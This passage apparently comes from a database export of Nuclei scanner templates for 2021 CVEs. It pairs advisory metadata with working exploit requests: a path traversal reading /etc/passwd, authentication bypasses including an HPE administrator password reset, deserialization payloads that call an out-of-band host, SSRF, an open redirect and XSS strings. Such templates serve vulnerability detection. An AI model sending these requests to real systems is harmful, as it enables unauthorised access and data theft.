matchers-condition: or\n matchers:\n - type: word\n part: body\n words:\n - \"Apache Server Status\"\n - \"Server Version\"\n condition: and\n\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a00473045022100b939a30c5fa64f54a4180624144395644b93b75e550c7fda141b0701557eb81a022020316b99faf609c753aa339b44f4c18e3ee753c37e12bb8458c089b611608981:922c64590222798bb761d5b6d8e72950", "hash": "dfd071952b0a53d1415f6bdded6b996d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308330" }, "name": "CVE-2021-28937.yaml", "content": "id: CVE-2021-28937\n\ninfo:\n name: Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure\n author: geeknik\n severity: high\n description: Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext.\n impact: |\n An attacker can obtain the repeater's password, compromising the security of the network.\n remediation: |\n Update the firmware to the latest version or replace the vulnerable repeater with a secure alternative.\n reference:\n - https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990\n - http://acexy.com\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28937\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-28937\n cwe-id: CWE-312\n epss-score: 0.02476\n epss-percentile: 0.88958\n cpe: cpe:2.3:o:acexy:wireless-n_wifi_repeater_firmware:28.08.06.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: acexy\n product: wireless-n_wifi_repeater_firmware\n tags: cve2021,cve,acexy,disclosure,iot\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/password.html\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Password Setting\"\n - \"addCfg('username'\"\n - \"addCfg('newpass'\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f7ec4fddabd7c4e5b1c92e0a85de60107cb725edc697e92e2eec4031dc194c4f022100fa8b0762adbb4978b6f4b3b73d9e186a6a3e682452584d6b5cab085151013335:922c64590222798bb761d5b6d8e72950", "hash": "baa70d863383137f2a059d84faa48f7a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308331" }, "name": "CVE-2021-29006.yaml", "content": "id: CVE-2021-29006\n\ninfo:\n name: rConfig 3.9.6 - Local File Inclusion\n author: r3Y3r53\n severity: medium\n description: |\n rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.\n reference:\n - https://github.com/mrojz/rconfig-exploit/blob/main/CVE-2021-29006-POC.py\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29006\n - http://rconfig.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-29006\n cwe-id: CWE-22\n epss-score: 0.09465\n epss-percentile: 0.94172\n cpe: cpe:2.3:a:rconfig:rconfig:3.9.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rconfig\n product: rconfig\n shodan-query: http.title:\"rConfig\"\n tags: cve2021,cve,rconfig,authenticated,lfi\n\nhttp:\n - raw:\n - |\n POST /lib/crud/userprocess.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&pass={{password}}&sublogin=1\n - |\n GET /dashboard.php HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body_3\n regex:\n - 'root:.*:0:0:'\n\n - type: word\n part: body_2\n words:\n - 'rconfig'\n\n - type: status\n part: header_3\n status:\n - 200\n# digest: 4a0a0047304502207fdb822293ed117ac244b6204a862e4cd97d7ed5b1a6da75806a95ba16942845022100cbb141a3f60efdaf36945a8ed3e93034fdb9dfa1e221d0ad775fbc7319d814a5:922c64590222798bb761d5b6d8e72950", "hash": "c9a738623472ed3e4fe30af76f1fddd0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308332" }, "name": "CVE-2021-29156.yaml", "content": "id: CVE-2021-29156\n\ninfo:\n name: LDAP Injection In OpenAM\n author: melbadry9,xelkomy\n severity: high\n description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.\n impact: |\n Allows an attacker to execute arbitrary LDAP queries and potentially gain unauthorized access to sensitive information or perform unauthorized actions\n remediation: Upgrade to OpenAM commercial version 13.5.1 or later.\n reference:\n - https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md https://hackerone.com/reports/1278050 https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/ https://portswigger.net/research/hidden-oauth-attack-vectors\n - https://portswigger.net/research/hidden-oauth-attack-vectors\n - https://bugster.forgerock.org/jira/browse/OPENAM-10135\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-29156\n cwe-id: CWE-74\n epss-score: 0.30859\n epss-percentile: 0.96857\n cpe: cpe:2.3:a:forgerock:openam:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: forgerock\n product: openam\n shodan-query: http.title:\"OpenAM\"\n tags: cve2021,cve,openam,ldap,injection,forgerock\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/openam/ui/PWResetUserValidation\"\n - \"{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation\"\n - \"{{BaseURL}}/ui/PWResetUserValidation\"\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(body, \"jato.pageSession\") && status_code==200'\n# digest: 4b0a00483046022100f68e3d98c58d25d03ff3e8158d70a9ad115e6df55f3f08a9e018c8c60ff399bf022100ff6e52bcdc34a7cadbffc2d9434a6273c3c09e60f8b00b28475b6dbd257f383d:922c64590222798bb761d5b6d8e72950", "hash": "f85d77e3846a16e3f9584d07d8487b8e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308333" }, "name": "CVE-2021-29200.yaml", "content": "id: CVE-2021-29200\n\ninfo:\n name: Apache OFBiz < 17.12.07 - Arbitrary Code Execution\n author: your3cho\n severity: critical\n description: |\n Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack\n reference:\n - http://www.openwall.com/lists/oss-security/2021/04/27/4\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29200\n - https://github.com/freeide/CVE-2021-29200\n - https://lists.apache.org/thread.html/r108a964764b8bd21ebd32ccd4f51c183ee80a251c105b849154a8e9d%40%3Ccommits.ofbiz.apache.org%3E\n - https://lists.apache.org/thread.html/r708351f1a8af7adb887cc3d8a92bed8fcbff4a9e495e69a9ee546fda%40%3Cnotifications.ofbiz.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-29200\n cwe-id: CWE-502\n epss-score: 0.90403\n epss-percentile: 0.98567\n cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: ofbiz\n shodan-query: html:\"OFBiz\"\n fofa-query: app=\"Apache_OFBiz\"\n tags: cve2021,cve,apache,ofbiz,deserialization,rce\n\nhttp:\n - raw:\n - |\n POST /webtools/control/SOAPService HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n \n \n \n \n {{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"hex\")}}\n \n \n \n \n \n \n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - 'value=\"responseMessage\"'\n# digest: 4a0a00473045022100842f48db1f533b0389671ceacc6111d6a44a0afdfc37ff547588aad0db0d2ce2022016235842d399bdd5cd3de0e7a4ffe58712448327b137121c349c382f12604969:922c64590222798bb761d5b6d8e72950", "hash": "86d2e77439069fff6ec49c8e1b1cb8e3", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308334" }, "name": "CVE-2021-29203.yaml", "content": "id: CVE-2021-29203\n\ninfo:\n name: HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass\n author: madrobot\n severity: critical\n description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access to sensitive information, unauthorized configuration changes, or disruption of the affected system.\n remediation: |\n Upgrade to HPE Edgeline Infrastructure Manager version 1.22 or later to mitigate this vulnerability.\n reference:\n - https://www.tenable.com/security/research/tra-2021-15\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29203\n - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn04124en_us\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-29203\n cwe-id: CWE-306\n epss-score: 0.95519\n epss-percentile: 0.99258\n cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: hp\n product: edgeline_infrastructure_manager\n tags: cve2021,cve,hpe,bypass,tenable,hp\n\nhttp:\n - raw:\n - |\n PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/json\n\n {\"Password\":\"{{randstr}}\"}\n - |\n POST /redfish/v1/SessionService/Sessions/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"UserName\":\"Administrator\",\"Password\":\"{{randstr}}\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"X-Auth-Token\"\n - \"PasswordReset\"\n - \"Location\"\n condition: and\n\n - type: word\n part: body\n words:\n - \"Base.1.0.Created\"\n\n - type: status\n status:\n - 201\n# digest: 4b0a00483046022100c7161451646d6a32f88513326984a5378871e42c39116388da64bb5234bb53cc022100a496b69cc17baef6be5e7b210c42daf08c840af4df3b421118b17ae99875b4e5:922c64590222798bb761d5b6d8e72950", "hash": "14eb8f7cefa115ede9c8744669aff0ff", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308335" }, "name": "CVE-2021-29441.yaml", "content": "id: CVE-2021-29441\n\ninfo:\n name: Nacos <1.4.1 - Authentication Bypass\n author: dwisiswant0\n severity: critical\n description: |\n This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.\n\n In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)\n Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that\n enables Nacos servers to bypass this filter and therefore skip authentication checks.\n This mechanism relies on the user-agent HTTP header so it can be easily spoofed.\n This issue may allow any user to carry out any administrative tasks on the Nacos server.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data and potential compromise of the Nacos server.\n remediation: |\n Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29441).\n reference:\n - https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/\n - https://github.com/alibaba/nacos/issues/4701\n - https://github.com/advisories/GHSA-36hp-jr8h-556f\n - https://github.com/alibaba/nacos/pull/4703\n - https://github.com/bakery312/Vulhub-Reproduce\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-29441\n cwe-id: CWE-290\n epss-score: 0.96598\n epss-percentile: 0.99603\n cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: alibaba\n product: nacos\n tags: cve2021,cve,nacos,auth-bypass,alibaba\n\nhttp:\n - raw:\n - |\n POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n User-Agent: Nacos-Server\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"status_code_1 == 403\"\n - \"status_code_2 == 200\"\n condition: and\n\n - type: dsl\n dsl:\n - \"contains(body_1, 'Forbidden')\"\n - \"body_2 == 'true'\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n# digest: 4b0a00483046022100c8f6e5b49ec78c3583d2a7ff0a3f4cf62b8310ee7956fcde381ed13ba7d30767022100fe6dd0baed8b64e99e050bd2998107dcf78755160d6064bfea8bb2b15e5b0b3a:922c64590222798bb761d5b6d8e72950", "hash": "2d0d2236f84b47ddfa22cf1d4321c8cd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308336" }, "name": "CVE-2021-29442.yaml", "content": "id: CVE-2021-29442\n\ninfo:\n name: Nacos <1.4.1 - Authentication Bypass\n author: dwisiswant0\n severity: high\n description: |\n Nacos before version 1.4.1 is vulnerable to authentication bypass because the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql).\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data and potential compromise of the Nacos server.\n remediation: |\n Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29442).\n reference:\n - https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/\n - https://github.com/alibaba/nacos/issues/4463\n - https://github.com/alibaba/nacos/pull/4517\n - https://github.com/advisories/GHSA-36hp-jr8h-556f\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29442\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-29442\n cwe-id: CWE-306\n epss-score: 0.9676\n epss-percentile: 0.99596\n cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: alibaba\n product: nacos\n tags: cve2021,cve,nacos,auth-bypass,alibaba\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n part: body\n regex:\n - \"\\\"TABLENAME\\\":\\\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\\\"\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201388a197774893b07ac833cc170235546644445e70aaf61aed8f306ab297ab4402201bcd114be7db3bf0c58986c8697b0a3dcfccff01035a9c57014d503de27c864c:922c64590222798bb761d5b6d8e72950", "hash": "51400b7577515bbef6b326bdc513f11b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308337" }, "name": "CVE-2021-29484.yaml", "content": "id: CVE-2021-29484\n\ninfo:\n name: Ghost CMS <=4.32 - Cross-Site Scripting\n author: rootxharsh,iamnoooob\n severity: medium\n description: Ghost CMS 4.0.0 to 4.3.2 contains a DOM cross-site scripting vulnerability. An unused endpoint added during the development of 4.0.0 allows attackers to gain access by getting logged-in users to click a link containing malicious code.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: This issue has been fixed in 4.3.3.\n reference:\n - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg\n - https://www.npmjs.com/package/ghost\n - https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29484\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N\n cvss-score: 6.8\n cve-id: CVE-2021-29484\n cwe-id: CWE-79\n epss-score: 0.01008\n epss-percentile: 0.82062\n cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*\n metadata:\n max-request: 1\n vendor: ghost\n product: ghost\n framework: node.js\n tags: cve2021,cve,xss,ghost,node.js\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ghost/preview\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'XMLHttpRequest.prototype.open'\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022064bd44c4eb294d3c6ae23aadabeaf4342d055409c28de4185c1568c395efc345022100a32a753e4a9e222c83c6cbb9f73af94180ec63c52b800a77f1b414dfe3cf2272:922c64590222798bb761d5b6d8e72950", "hash": "2059aa4a10847deaa95c95601ab87900", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308338" }, "name": "CVE-2021-29490.yaml", "content": "id: CVE-2021-29490\n\ninfo:\n name: Jellyfin 10.7.2 - Server Side Request Forgery\n author: alph4byt3\n severity: medium\n description: |\n Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.\n impact: |\n This vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further exploitation of the target system.\n remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints \"/Items/*/RemoteImages/Download\", \"/Items/RemoteSearch/Image\" and \"/Images/Remote\".\n reference:\n - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29490\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/HimmelAward/Goby_POC\n - https://github.com/Threekiii/Awesome-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N\n cvss-score: 5.8\n cve-id: CVE-2021-29490\n cwe-id: CWE-918\n epss-score: 0.00159\n epss-percentile: 0.51433\n cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: jellyfin\n product: jellyfin\n shodan-query: http.title:\"Jellyfin\"\n tags: cve,cve2021,ssrf,jellyfin,oast\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/\"\n - \"{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB\"\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"

    Interactsh Server

    \"\n# digest: 4b0a00483046022100f125f16d207fd3e53d356fe5c41c9fc12d9d715224fdfcef6af1a426dfe83f56022100e3216df501445badb52c586e7310fb9f642bcb812d9a98de6f3af7b9bd8f2875:922c64590222798bb761d5b6d8e72950", "hash": "e9aa336d4162f1dfba9efc4b01a872f3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308339" }, "name": "CVE-2021-29505.yaml", "content": "id: CVE-2021-29505\n\ninfo:\n name: XStream <1.4.17 - Remote Code Execution\n author: pwnhxl\n severity: high\n description: |\n XStream before 1.4.17 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: Patched in 1.4.17.\n reference:\n - https://paper.seebug.org/1543/\n - https://github.com/vulhub/vulhub/blob/master/xstream/CVE-2021-29505/README.zh-cn.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29505\n - https://github.com/x-stream/xstream/security/advisories/GHSA-7chv-rrw6-w6fc\n - https://nvd.nist.gov/vuln/detail/cve-2021-29505\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-29505\n cwe-id: CWE-502\n epss-score: 0.04677\n epss-percentile: 0.91814\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve2021,cve,oast,vulhub,xstream,deserialization,rce,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n \n 2\n \n 3\n \n 12345\n \n com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content\n \n \n \n 12345\n \n \n true\n SOAP_11\n \n \n false\n \n \n \n \n aa\n aa\n \n \n \n \n \n UnicastRef\n {{interactsh-url}}\n 1099\n 0\n 0\n 0\n 0\n false\n \n \n {{interactsh-url}}\n 1099\n \n \n \n \n \n \n \n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"timestamp\"\n - \"com.thoughtworks.xstream\"\n condition: or\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100dbbd8f5e47047dc1ce75b7aa5cebea7678b2035517dd765160b1b31106393cd7022100b3ecc5d68e800b780f78acdae9aa0f9f80b4d2b8778cc7a32e7fce49e0ff5c60:922c64590222798bb761d5b6d8e72950", "hash": "7ce3482f5fa2bddd36f812199a62b610", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30833a" }, "name": "CVE-2021-29622.yaml", "content": "id: CVE-2021-29622\n\ninfo:\n name: Prometheus - Open Redirect\n author: geeknik\n severity: medium\n description: Prometheus 2.23.0 through 2.26.0 and 2.27.0 contains an open redirect vulnerability. To ensure a seamless transition to 2.27.0, the default UI was changed to the new UI with a URL prefixed by /new redirect to /. Due to a bug in the code, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the disclosure of sensitive information.\n remediation: The issue was patched in the 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. The workaround is to disable access to /new via a reverse proxy in front of Prometheus.\n reference:\n - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7\n - https://github.com/prometheus/prometheus/releases/tag/v2.26.1\n - https://github.com/prometheus/prometheus/releases/tag/v2.27.1\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29622\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-29622\n cwe-id: CWE-601\n epss-score: 0.00269\n epss-percentile: 0.64358\n cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: prometheus\n product: prometheus\n tags: cve2021,cve,prometheus,redirect\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/new/newhttp://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4b0a00483046022100835e27d67c02978fd0bee911d344ea0062c9e27f3aa7ebaa04152f8a13c5fb1502210086d26f492cb3cba2db01d24993db842112f1f8c56d94e7472d45703b2f8be045:922c64590222798bb761d5b6d8e72950", "hash": "e3022dc14861e543360181f0721c3650", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30833b" }, "name": "CVE-2021-29625.yaml", "content": "id: CVE-2021-29625\n\ninfo:\n name: Adminer <=4.8.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Adminer 4.6.1 to 4.8.0 contains a cross-site scripting vulnerability which affects users of MySQL, MariaDB, PgSQL, and SQLite in browsers without CSP when Adminer uses a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the Adminer interface, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: This vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`).\n reference:\n - https://sourceforge.net/p/adminer/bugs-and-features/797/\n - https://github.com/vrana/adminer/commit/4043092ec2c0de2258d60a99d0c5958637d051a7\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29625\n - https://github.com/vrana/adminer/security/advisories/GHSA-2v82-5746-vwqc\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-29625\n cwe-id: CWE-79\n epss-score: 0.00222\n epss-percentile: 0.60557\n cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: adminer\n product: adminer\n tags: cve2021,cve,adminer,xss,sqli\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502203bbedb78e2e0bddd6d7b3eefa0c1fca62d18deb2759881cb15089fbac64253a0022100cc7857e4cfd08807f6efcec5c623f04693979c11de46feee3edb0b5ec2ba53db:922c64590222798bb761d5b6d8e72950", "hash": "8f7044e2829412b326512ec26000b22f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30833c" }, "name": "CVE-2021-3002.yaml", "content": "id: CVE-2021-3002\n\ninfo:\n name: Seo Panel 4.8.0 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor.\n reference:\n - http://www.cinquino.eu/SeoPanelReflect.htm\n - https://github.com/seopanel/Seo-Panel/issues/202\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3002\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ArrestX/--POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-3002\n cwe-id: CWE-79\n epss-score: 0.00143\n epss-percentile: 0.49273\n cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: \"seopanel\"\n product: seo_panel\n tags: cve2021,cve,seopanel,xss\n\nhttp:\n - raw:\n - |\n POST /seo/seopanel/login.php?sec=forgot HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \"\"\n - \"seopanel\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502207e4f1ee2781a368be0c458eaaae8adb53e43b78fb18efe6e0ddbd4360db50c72022100bf77a98625b43e44488d9ed1d3bc33636a35c06b8c93ced20fe941ed6cf52a97:922c64590222798bb761d5b6d8e72950", "hash": 